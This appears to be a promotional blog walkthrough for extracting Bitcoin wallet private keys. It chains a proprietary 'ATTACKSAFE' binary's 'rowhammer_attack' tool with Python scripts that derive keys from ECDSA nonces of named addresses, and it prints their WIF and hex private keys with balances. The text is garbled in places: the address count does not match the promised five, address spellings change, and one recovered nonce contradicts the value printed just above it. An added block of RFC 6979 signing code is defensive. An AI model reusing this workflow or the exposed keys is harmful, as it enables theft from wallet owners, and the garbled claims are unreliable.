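The greatest cryptographic strength of the Bitcoin cryptocurrency is a computational method in discrete mathematics that takes as its basis the problem of factoring large integers and the hidden number problem (HNP) in Bitcoin ECDSA signature transactions.
In this article we will apply differential fault analysis to ECDSA signatures and derive private keys from the transactions of five different Bitcoin wallets. The Rowhammer Attack on Bitcoin allows us to efficiently find all zeros of a normalized polynomial modulo some value, and we apply this method to the ECDSA signature algorithm, more precisely to highly vulnerable transactions in the Bitcoin blockchain.
We will multiply different powers of the same element of a finite field; curiously, they can coincide and give us a particular function over the finite field that can be specified with a Lagrange interpolation polynomial.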


The theoretical part of this attack can be found in the article from the list of popular attacks on Bitcoin: "Rowhammer Attack on Bitcoin"

www.attacksafe.ru/rowhammer-attack-on-bitcoin
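From our earlier publications we know that the Bitcoin blockchain contains many vulnerable and weak ECDSA transactions, and during our cryptanalysis we found many Bitcoin addresses that made a large number of signatures with a disclosed secret key "K" (NONCE).
Thus, knowing the secret key, we can accurately obtain the private key of the Bitcoin wallet.
Consider five Bitcoin addresses: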
1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
18hdfynnojmiMmBMsrkXNFWketq4mmDHB
14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
Each Bitcoin address made two critically vulnerable transactions:
1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o


18hdfynnojmiMmBMsrkXNFWketq4mmDHB


14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP


17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc


18vXv21kk8PfN4KRX5i19QvDRM855qheQ


Disclosure of the secret key "K" (NONCE) in the Bitcoin blockchain
Implementing the efficient Rowhammer Attack algorithm using our 15RowhammerAttack repository
git clone https://github.com/demining/CryptoDeepTools.git
cd CryptoDeepTools/15RowhammerAttack/
ls

Install all the packages we need

requirements.txt
sudo apt install python2-minimal
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2 get-pip.py
pip2 install -r requirements.txt



Prepare RawTX for the attack
1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o

RawTX = 0100000001cb9a792b88760ad20c67047c06d016ba4a069d036c4fbc5c09a8055fe786580f300000006a4730440220331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc6702200bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff401210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
Now we need to get all the R, S, Z values from all vulnerable transactions
Let's use the breakECDSA.py script
python2 breakECDSA.py 0100000001cb9a792b88760ad20c67047c06d016ba4a069d036c4fbc5c09a8055fe786580f300000006a4730440220331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc6702200bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff401210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

R = 0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67
S = 0x0bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff4
Z = 0x9d86bea51385f6a56835d0148e7f23a353605bab339127e800112307e6727d2d
To carry out the attack and obtain the secret key, we will use the "ATTACKSAFE SOFTWARE"

www.attacksafe.ru/software
Access rights:
chmod +x attacksafe

Usage:
./attacksafe -help

-version: software version
-list: list of bitcoin attacks
-tool: indicate the attack
-gpu: enable gpu
-time: work timeout
-server: server mode
-port: server port
-open: open file
-save: save file
-search: vulnerability search
-stop: stop at mode
-max: maximum quantity in mode
-min: minimum quantity per mode
-speed: boost speed for mode
-range: specific range
-crack: crack mode
-field: starting field
-point: starting point
-inject: injection regimen
-decode: decoding mode
./attacksafe -version

"ATTACKSAFE SOFTWARE"
includes all popular attacks on Bitcoin.
Let's list all the attacks:
./attacksafe -list



Then choose -tool: rowhammer_attack
To obtain the secret key from the vulnerable ECDSA signature transaction, let's add the RawTX data to a text document and save it as the file RawTX.txt
0100000001cb9a792b88760ad20c67047c06d016ba4a069d036c4fbc5c09a8055fe786580f300000006a4730440220331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc6702200bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff401210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
Launch -tool rowhammer_attack using the "ATTACKSAFE SOFTWARE"
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

We launched this attack with -tool rowhammer_attack and saved the result to the file SecretKey.txt
Now, to see the successful result, open the file SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0x6251240a6cb656310dbd7f0da53a315ab88ec253352a5d5481ee08e977b6ef2d
RawTX = 0100000001cb9a792b88760ad20c67047c06d016ba4a069d036c4fbc5c09a8055fe786580f300000006a4730440220331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc6702200bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff401210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
We see the inscription "Deployments ECDSA", which means there is a critical vulnerability in the Bitcoin blockchain transaction.
SecretKey is a value in HEX format; this is our secret key "K" (NONCE):
K = 0x6251240a6cb656310dbd7f0da53a315ab88ec253352a5d5481ee08e977b6ef2d
Let's check it with the Python script point2gen.py
To do this, install the ECPy elliptic curve library:
pip3 install ECPy

Now let's run the script, specifying the secret key "K" (NONCE):
python3 point2gen.py 0x6251240a6cb656310dbd7f0da53a315ab88ec253352a5d5481ee08e977b6ef2d

(0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67 , 0xc6efa8de714dd94d7b659d8935aa9036ada6a2b541a03360901fc195fd0e2cf6)
EC (secp256k1)
Check the coordinates of the point against the signature value R
R = 0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67
S = 0x0bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff4
Z = 0x9d86bea51385f6a56835d0148e7f23a353605bab339127e800112307e6727d2d
R = 0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67
point2gen = (0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67 , 0xc6efa8de714dd94d7b659d8935aa9036ada6a2b541a03360901fc195fd0e2cf6)
ALL CORRECT!
K = 0x6251240a6cb656310dbd7f0da53a315ab88ec253352a5d5481ee08e977b6ef2d
Now, knowing the secret key, we can get the private key of the Bitcoin wallet: 1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
Let's use the Python script: calculate.py
> > > Get the private key
Let's open the code and add all the signature values K, R, S, Z
def h(n):
    # Hex string without the "0x" prefix
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    # Extended Euclidean algorithm: returns (gcd, x, y) with aa*x + bb*y == gcd
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    # Modular inverse of a modulo m
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m

N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0x6251240a6cb656310dbd7f0da53a315ab88ec253352a5d5481ee08e977b6ef2d
R = 0x331353fedfd6e4d6805fc1f06443ade552a43a43237fb6c3de3c7f0969b4cc67
S = 0x0bfec7e7d2ae249b3d69cd8d666b5ee833394af3b0703fa023579200d9ab2ff4
Z = 0x9d86bea51385f6a56835d0148e7f23a353605bab339127e800112307e6727d2d
print (h((((S * K) - Z) * modinv(R,N)) % N))
The script will calculate the private key using the formula:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
Let's run the script:
python3 calculate.py

PrivKey = aa35fda8f16d06ae02bdcf671e03035795a0b0ecbdae45098928f6587016a932
Let's open bitaddress and check:
ADDR: 1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
WIF: L2vaWmjh7XpV9AMWDjmNSGPQNEd4QG7YGAMMqPEmGSt8WSppysCV
HEX: aa35fda8f16d06ae02bdcf671e03035795a0b0ecbdae45098928f6587016a932

The private key is found!

www.blockchain.com/btc/address/1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
BALANCE: $ 708.02
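The potential threat of losing BTC coins lies in a critical vulnerability of Bitcoin blockchain transactions, so we strongly recommend that everyone always update their software and use only verified devices.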
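The formula above works for any ECDSA signature whose nonce K becomes known, which is why signers derive K deterministically (RFC 6979) and treat it as key material that is never logged or exported. The following added example is not part of the original article or the CryptoDeepTools repository: it signs on secp256k1 with an RFC 6979 nonce and checks, on a constructed throwaway key, that disclosing K is equivalent to disclosing the private key. All function names and the demo key and message are assumptions made for illustration.

```python
import hashlib
import hmac

# secp256k1 domain parameters: field prime, group order, generator
P = 2**256 - 2**32 - 977
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)


def inv(a, m):
    """Modular inverse for a prime modulus m (Fermat's little theorem)."""
    return pow(a % m, m - 2, m)


def add(p1, p2):
    """Affine point addition on secp256k1; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = 3 * x1 * x1 * inv(2 * y1, P) % P
    else:
        lam = (y2 - y1) * inv(x2 - x1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P


def mul(k, point=G):
    """Double-and-add scalar multiplication (not constant time: demo only)."""
    result = None
    while k:
        if k & 1:
            result = add(result, point)
        point = add(point, point)
        k >>= 1
    return result


def rfc6979_nonce(d, z):
    """Deterministic nonce per RFC 6979 section 3.2 (HMAC-SHA256, 256-bit order)."""
    def mac(key, data):
        return hmac.new(key, data, hashlib.sha256).digest()
    x = d.to_bytes(32, "big")
    h1 = (z % N).to_bytes(32, "big")
    v, key = b"\x01" * 32, b"\x00" * 32
    key = mac(key, v + b"\x00" + x + h1)
    v = mac(key, v)
    key = mac(key, v + b"\x01" + x + h1)
    v = mac(key, v)
    while True:
        v = mac(key, v)
        k = int.from_bytes(v, "big")
        if 1 <= k < N:
            return k
        key = mac(key, v + b"\x00")
        v = mac(key, v)


def sign(d, z):
    """ECDSA signature (r, s) over hash z; the nonce never leaves this function."""
    k = rfc6979_nonce(d, z)
    r = mul(k)[0] % N
    s = inv(k, N) * (z + r * d) % N
    if r == 0 or s == 0:
        raise ValueError("degenerate signature")
    return r, s


def verify(pub, z, r, s):
    """Standard ECDSA verification against public key point pub."""
    if not (1 <= r < N and 1 <= s < N):
        return False
    w = inv(s, N)
    pt = add(mul(z * w % N), mul(r * w % N, pub))
    return pt is not None and pt[0] % N == r


def key_from_disclosed_nonce(k, r, s, z):
    """The page's formula: d = (s*k - z) * r^-1 mod n."""
    return (s * k - z) * inv(r, N) % N


def demo():
    """Constructed key and message, not a real wallet."""
    d = int.from_bytes(hashlib.sha256(b"constructed demo key").digest(), "big") % N
    z = int.from_bytes(hashlib.sha256(b"constructed message").digest(), "big")
    r, s = sign(d, z)
    k = rfc6979_nonce(d, z)  # what a debug log or faulty signer would expose
    return verify(mul(d), z, r, s), key_from_disclosed_nonce(k, r, s, z) == d
```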
Through detailed cryptanalysis, we also found a critical vulnerability for the same Bitcoin address in TXID: 96c94c5b69c60ab4e3889b11fee54519fc6ff0f228f37554dd0dc766ab3909ef
Prepare RawTX for the attack
1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o

RawTX = 010000000104118e34a0d3c06c842d14707ed5f333d3ba1d35240086a4b5738a2fa810abec1d0000006a473044022004b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb20220282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad501210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff014e020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000
Now we need to get all the R, S, Z values from all vulnerable transactions
Let's use the breakECDSA.py script
python2 breakECDSA.py 010000000104118e34a0d3c06c842d14707ed5f333d3ba1d35240086a4b5738a2fa810abec1d0000006a473044022004b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb20220282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad501210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff014e020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

R = 0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2
S = 0x282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad5
Z = 0x7270a25b48c53581f9babe8edcf27f9a038e7b57e817a8b242a49e2248bc71a7
To obtain the secret key from the vulnerable ECDSA signature transaction, let's add the RawTX data to a text document and save it as the file RawTX.txt
010000000104118e34a0d3c06c842d14707ed5f333d3ba1d35240086a4b5738a2fa810abec1d0000006a473044022004b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb20220282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad501210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff014e020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000
Launch -tool rowhammer_attack using the "ATTACKSAFE SOFTWARE"
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

We launched this attack with -tool rowhammer_attack and saved the result to the file SecretKey.txt
Now, to see the successful result, open the file SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0xe5fa9dccef88781e25e77bd1ea7830c0b33c57481b79007cda117da8139ea7c3
RawTX = 010000000104118e34a0d3c06c842d14707ed5f333d3ba1d35240086a4b5738a2fa810abec1d0000006a473044022004b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb20220282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad501210335a395eca8191c43ccee4d91e98b9baef39476d7482cf636e5b71975c69feebdffffffff014e020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000
We see the inscription "Deployments ECDSA", which means there is a critical vulnerability in the Bitcoin blockchain transaction.
SecretKey is a value in HEX format; this is our secret key "K" (NONCE):
K = 0xe5fa9dccef88781e25e77bd1ea7830c0b33c57481b79007cda117da8139ea7c3
Let's check it with the Python script point2gen.py
Let's use the ECPy elliptic curve library:
Now let's run the script, specifying the secret key "K" (NONCE):
python3 point2gen.py 0xe5fa9dccef88781e25e77bd1ea7830c0b33c57481b79007cda117da8139ea7c3

(0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2 , 0x212c1b682ab25c069306f57725e904094c352014ea78903fbc153a129f3171e4)
EC (secp256k1)
Check the coordinates of the point against the signature value R
R = 0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2
S = 0x282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad5
Z = 0x7270a25b48c53581f9babe8edcf27f9a038e7b57e817a8b242a49e2248bc71a7
R = 0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2
point2gen = (0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2 , 0x212c1b682ab25c069306f57725e904094c352014ea78903fbc153a129f3171e4)
ALL CORRECT!
K = 0xe5fa9dccef88781e25e77bd1ea7830c0b33c57481b79007cda117da8139ea7c3
Now, knowing the secret key, we can get the private key of the Bitcoin wallet: 1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
Let's use the Python script: calculate.py
> > > Get the private key
Let's open the code and add all the signature values K, R, S, Z
def h(n):
    # Hex string without the "0x" prefix
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    # Extended Euclidean algorithm: returns (gcd, x, y) with aa*x + bb*y == gcd
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    # Modular inverse of a modulo m
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m

N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0xe5fa9dccef88781e25e77bd1ea7830c0b33c57481b79007cda117da8139ea7c3
R = 0x04b1d0c7d278439811c27d9ff06b3bb0fd20d5cc90d97083266bdba7d0693bb2
S = 0x282c6cea6b9ad6f4633596204ebad4716e2a086090faf62a6908bf63a1724ad5
Z = 0x7270a25b48c53581f9babe8edcf27f9a038e7b57e817a8b242a49e2248bc71a7
print (h((((S * K) - Z) * modinv(R,N)) % N))
The script will calculate the private key using the formula:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
Let's run the script:
python3 calculate.py

PrivKey = aa35fda8f16d06ae02bdcf671e03035795a0b0ecbdae45098928f6587016a932
Let's open bitaddress and check:
ADDR: 1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
WIF: L2vaWmjh7XpV9AMWDjmNSGPQNEd4QG7YGAMMqPEmGSt8WSppysCV
HEX: aa35fda8f16d06ae02bdcf671e03035795a0b0ecbdae45098928f6587016a932

The private key is found!

www.blockchain.com/btc/address/1HhZSwcEj5ncVoPT9bAupvcEjwToY1rJ1o
BALANCE: $ 708.02
№2
Through detailed cryptanalysis, we also found a critical vulnerability in the Bitcoin address:
18hdfynnojmiMmBMsrkXNFWketq4mmDHB


Prepare RawTX for the attack
18hdfynnojmiMmBMsrkXNFWketq4mmDHB

RawTX = 0100000001a11dd54f81e27ca14eaf9bb4c94e6b91398130bdb09a71fa2dccf994636de08a1d0000006b483045022100f6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386022048c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000
Now we need to get all the R, S, Z values from all vulnerable transactions
Let's use the breakECDSA.py script
python2 breakECDSA.py 0100000001a11dd54f81e27ca14eaf9bb4c94e6b91398130bdb09a71fa2dccf994636de08a1d0000006b483045022100f6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386022048c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

R = 0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386
S = 0x48c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f
Z = 0x51e6147848d2e81e2b6b71a5f2b29be5121752b88cc1d5e1392c001b04b4c2d9
To obtain the secret key from the vulnerable ECDSA signature transaction, let's add the RawTX data to a text document and save it as the file RawTX.txt
0100000001a11dd54f81e27ca14eaf9bb4c94e6b91398130bdb09a71fa2dccf994636de08a1d0000006b483045022100f6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386022048c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000
Launch -tool rowhammer_attack using the "ATTACKSAFE SOFTWARE"
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

We launched this attack with -tool rowhammer_attack and saved the result to the file SecretKey.txt
Now, to see the successful result, open the file SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca
RawTX = 0100000001a11dd54f81e27ca14eaf9bb4c94e6b91398130bdb09a71fa2dccf994636de08a1d0000006b483045022100f6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386022048c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000
We see the inscription "Deployments ECDSA", which means there is a critical vulnerability in the Bitcoin blockchain transaction.
SecretKey is a value in HEX format; this is our secret key "K" (NONCE):
K = 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca
Let's check it with the Python script point2gen.py
Let's use the ECPy elliptic curve library:
Now let's run the script, specifying the secret key "K" (NONCE):
python3 point2gen.py 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca

(0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386 , 0x3f43332421ee70c0e0ccab01f0b916fdf087f1df6cd2227f6d8d7212a3e6f806)
EC (secp256k1)
Check the coordinates of the point against the signature value R
R = 0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386
S = 0x48c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f
Z = 0x51e6147848d2e81e2b6b71a5f2b29be5121752b88cc1d5e1392c001b04b4c2d9
R = 0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386
point2gen = (0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386 , 0x3f43332421ee70c0e0ccab01f0b916fdf087f1df6cd2227f6d8d7212a3e6f806)
ALL CORRECT!
K = 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca
Now, knowing the secret key, we can get the private key of the Bitcoin wallet: 18hhdfynnojmiMmBMsrkXNFWketq4mmDHB
Let's use the Python script: calculate.py
> > > Get the private key
Let's open the code and add all the signature values K, R, S, Z
def h(n):
    # Hex string without the "0x" prefix
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    # Extended Euclidean algorithm: returns (gcd, x, y) with aa*x + bb*y == gcd
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    # Modular inverse of a modulo m
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m

N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca
R = 0xf6a4cf18e2806d4e729f7a71db5b66255499b8d25f0ee598bdf9b7b8183e4386
S = 0x48c1b699c4ac92dc3add691935b6e561d7e0ea1d7053af298c09c3e3f23e7f8f
Z = 0x51e6147848d2e81e2b6b71a5f2b29be5121752b88cc1d5e1392c001b04b4c2d9
print (h((((S * K) - Z) * modinv(R,N)) % N))
The script will calculate the private key using the formula:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
Let's run the script:
python3 calculate.py

PrivKey = 86990adfdb019df305b4d38a963c9f46a1fbeac332285d122b0e2f888de31fba
Let's open bitaddress and check:
ADDR: 18hhdfynnojmiMmBMsrkXNFWketq4mmDHB
WIF: L1jMLZYkKr2YoTLH9xWXS9jPMgeasnTxWmGrHBK9aMCW9ahsNDzP
HEX: 86990adfdb019df305b4d38a963c9f46a1fbeac332285d122b0e2f888de31fba

The private key is found!

www.blockchain.com/btc/address/18hhdfynnojmiMmBMsrkXNFWketq4mmDHB
BALANCE: $ 708.99
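The potential threat of losing BTC coins lies in a critical vulnerability of Bitcoin blockchain transactions, so we strongly recommend that everyone always update their software and use only verified devices.
Through detailed cryptanalysis, we also found a critical vulnerability for the same Bitcoin address in TXID: cfc6047c1ad23ddb9d3e0151217fe62f045429ffb225e878a07a0db6f98fb9b3
Prepare RawTX for the attack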
18hdfynnojmiMmBMsrkXNFWketq4mmDHB

RawTX = 0100000001e4705464562efc76d90240841ff3ed91c8db0b58ee4666502cb0a35cd5611f990d0000006a4730440220682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e880220052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0158020000000000001976a914406840ebc10519e0934c739a83a2d51f70ff09ae88ac00000000
Now we need to get all the R, S, Z values from all vulnerable transactions
Let's use the breakECDSA.py script
python2 breakECDSA.py 0100000001e4705464562efc76d90240841ff3ed91c8db0b58ee4666502cb0a35cd5611f990d0000006a4730440220682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e880220052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0158020000000000001976a914406840ebc10519e0934c739a83a2d51f70ff09ae88ac00000000

R = 0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88
S = 0x052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9
Z = 0x395e27708f075827fc7b179382a2a5e13c7649a046a89f2937bc5754349cc05d
To obtain the secret key from the vulnerable ECDSA signature transaction, let's add the RawTX data to a text document and save it as the file RawTX.txt
0100000001e4705464562efc76d90240841ff3ed91c8db0b58ee4666502cb0a35cd5611f990d0000006a4730440220682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e880220052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0158020000000000001976a914406840ebc10519e0934c739a83a2d51f70ff09ae88ac00000000
Launch -tool rowhammer_attack using the "ATTACKSAFE SOFTWARE"
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

We launched this attack with -tool rowhammer_attack and saved the result to the file SecretKey.txt
Now, to see the successful result, open the file SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0x093bf9a5eb46ddeff6bcf94a326d00f89bc0ce6cbada4c5897758550eae10383
RawTX = 0100000001e4705464562efc76d90240841ff3ed91c8db0b58ee4666502cb0a35cd5611f990d0000006a4730440220682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e880220052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9012102083a0f1f4d81e74cb2903feccbaf82f7cb5cbeecafd178caefa2fa10d2dfe54dffffffff0158020000000000001976a914406840ebc10519e0934c739a83a2d51f70ff09ae88ac00000000
We see the inscription "Deployments ECDSA", which means there is a critical vulnerability in the Bitcoin blockchain transaction.
SecretKey is a value in HEX format; this is our secret key "K" (NONCE):
K = 0x79aae6b77caa2bddd8e133f963bd236f71ff15dc9b50aa1d977bc4c44689edca
Let's check it with the Python script point2gen.py
Let's use the ECPy elliptic curve library:
Now let's run the script, specifying the secret key "K" (NONCE):
python3 point2gen.py 0x093bf9a5eb46ddeff6bcf94a326d00f89bc0ce6cbada4c5897758550eae10383

(0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88 , 0xbcf3873021aff3756d237abe2c29c074c77cd585d73a919135135150fcc30197)
EC (secp256k1)
Check the coordinates of the point against the signature value R
R = 0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88
S = 0x052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9
Z = 0x395e27708f075827fc7b179382a2a5e13c7649a046a89f2937bc5754349cc05d
R = 0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88
point2gen = (0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88 , 0xbcf3873021aff3756d237abe2c29c074c77cd585d73a919135135150fcc30197)
ALL CORRECT!
